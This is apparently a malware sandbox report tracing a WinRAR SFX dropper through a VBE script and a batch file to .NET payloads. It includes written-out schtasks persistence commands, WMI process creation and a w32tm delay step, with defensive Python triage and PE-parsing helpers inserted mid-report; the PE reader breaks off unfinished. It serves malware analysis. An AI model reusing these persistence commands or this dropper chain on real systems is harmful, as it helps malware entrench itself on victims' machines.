Source: C:\winSaves\fontsavesbroker.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\d27ed5bb774de595cac55fd063b1173b1f94783b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\winSaves\fontsavesbroker.exe | File created: C:\Users\user\AppData\Local\Temp\4ty73C4Ot0
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Command line argument: sfxname (0_2_004ED5D4)
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Command line argument: sfxstime (0_2_004ED5D4)
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Command line argument: STARTDLG (0_2_004ED5D4)
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Command line argument: xjR (0_2_004ED5D4)
Source: j0GOUGjcJD.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: j0GOUGjcJD.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: j0GOUGjcJD.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | File read: C:\Users\user\Desktop\j0GOUGjcJD.exe
Source: unknown | Process created: C:\Users\user\Desktop\j0GOUGjcJD.exe "C:\Users\user\Desktop\j0GOUGjcJD.exe"
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
Source: unknown | Process created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: mscoree.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: apphelp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: kernel.appcore.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: version.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: uxtheme.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: windows.storage.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: wldp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: profapi.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: cryptsp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: rsaenh.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: cryptbase.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: sspicli.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: ntmarta.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: wbemcomn.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: amsi.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: userenv.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: propsys.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: dlnashext.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: wpdshext.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: edputil.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: urlmon.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: iertutil.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: srvcli.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: netutils.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: wintypes.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: appresolver.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: bcp47langs.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: slc.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: sppc.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: mscoree.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: apphelp.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: kernel.appcore.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: version.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: uxtheme.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: windows.storage.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: wldp.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: profapi.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: cryptsp.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: rsaenh.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: cryptbase.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: sspicli.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: mscoree.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: kernel.appcore.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: version.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: uxtheme.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: windows.storage.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: wldp.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: profapi.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: cryptsp.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: rsaenh.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: cryptbase.dll
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Section loaded: sspicli.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: mscoree.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: kernel.appcore.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: version.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: uxtheme.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: windows.storage.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: wldp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: profapi.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: cryptsp.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: rsaenh.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: cryptbase.dll
            Source: C:\winSaves\fontsavesbroker.exe Section loaded: sspicli.dll
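The "Section loaded" rows above are easier to reason about per process than per row. The Python helper below is added here as an example; it is not part of the Joe Sandbox report or of any tooling the report describes. It parses rows in the report's own format (either as cleaned above or as the raw page text where the process path runs straight into "Section loaded"), groups DLL loads by process image, and annotates the combinations that matter for this chain: a managed (mscoree.dll) binary running from C:\winSaves\ that also loads the WMI client library wbemcomn.dll, the script host loading amsi.dll and scrrun.dll, and schtasks.exe loading taskschd.dll. The DLL-to-meaning table and the system-directory list are assumptions made for the example; the sample rows are copied from this report.

```python
"""Group Joe Sandbox "Section loaded" rows per process and annotate the loads
that matter for this chain.  Added example, not part of the report."""
import re
from collections import defaultdict

# Accepts both the cleaned row form and the raw page form, where the process
# path runs straight into "Section loaded" and the row ends in "Jump to behavior".
ROW_RE = re.compile(
    r"Source:\s*(?P<proc>[A-Za-z]:\\.+?\.exe)\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE)

# What a DLL load tells the analyst (assumed mapping for this example).
DLL_MEANING = {
    "mscoree.dll": "managed (.NET) code",
    "wbemcomn.dll": "WMI client",
    "amsi.dll": "AMSI-scanned script or assembly",
    "vbscript.dll": "VBScript engine",
    "scrrun.dll": "Scripting runtime (FileSystemObject)",
    "taskschd.dll": "Task Scheduler COM client",
    "dnsapi.dll": "DNS resolution",
}
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed excerpt: rows copied from this report, one per line.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\winSaves\fontsavesbroker.exe Section loaded: mscoree.dll
Source: C:\winSaves\fontsavesbroker.exe Section loaded: wbemcomn.dll
Source: C:\winSaves\fontsavesbroker.exe Section loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
"""


def parse_loads(text: str) -> dict:
    """process image -> ordered list of distinct DLLs it loaded."""
    loads = defaultdict(list)
    for m in ROW_RE.finditer(text):
        proc, dll = m.group("proc"), m.group("dll").lower()
        if dll not in loads[proc]:
            loads[proc].append(dll)
    return dict(loads)


def triage(text: str) -> dict:
    """process image -> list of analyst notes derived from its loads."""
    findings = {}
    for proc, dlls in parse_loads(text).items():
        notes = []
        if not proc.lower().startswith(SYSTEM_DIRS):
            notes.append("image outside system directories")
        notes += [DLL_MEANING[d] for d in dlls if d in DLL_MEANING]
        if "mscoree.dll" in dlls and "wbemcomn.dll" in dlls:
            notes.append("managed binary talking to WMI (cf. the report's "
                         "'Creates processes via WMI' signature)")
        findings[proc] = notes
    return findings


if __name__ == "__main__":
    for proc, notes in triage(SAMPLE).items():
        print(proc)
        for n in notes:
            print("   -", n)
```

Feed it the whole "Section loaded" table of a report and the per-process view makes the chain visible at a glance: the SFX stub, the VBScript stage, the two .NET payloads dropped under C:\winSaves\, and the scheduled-task and time-service helpers.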
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: j0GOUGjcJD.exe Static file information: File size 1141873 > 1048576
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: j0GOUGjcJD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: j0GOUGjcJD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: j0GOUGjcJD.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: j0GOUGjcJD.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: j0GOUGjcJD.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: j0GOUGjcJD.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
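The static PE lines above (the DllCharacteristics flags and the section that holds each data directory) are read from the optional header and the section table. The parser below is added here as an example and is not code from the report: it pulls exactly those fields out with struct, and for a stand-alone run builds a constructed, header-only PE32 image whose section layout mirrors the sample (import, load-config and IAT directories in .rdata, resources in .rsrc, relocations in .reloc, plus a .didat section). Every RVA and size in the constructed image is invented for the example; the sample's own values are not on the page, and its DEBUG directory is deliberately left unset because the report does not say which section holds it.

```python
"""Minimal PE header reader: DllCharacteristics flags and the section that
holds each data directory, i.e. the fields behind the report's static PE lines.
Added example, not part of the Joe Sandbox report."""
import struct

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH",
    0x0800: "NO_BIND", 0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
DATA_DIRECTORIES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def section_for_rva(sections, rva):
    """Name of the section whose virtual range contains rva, else None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def parse_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
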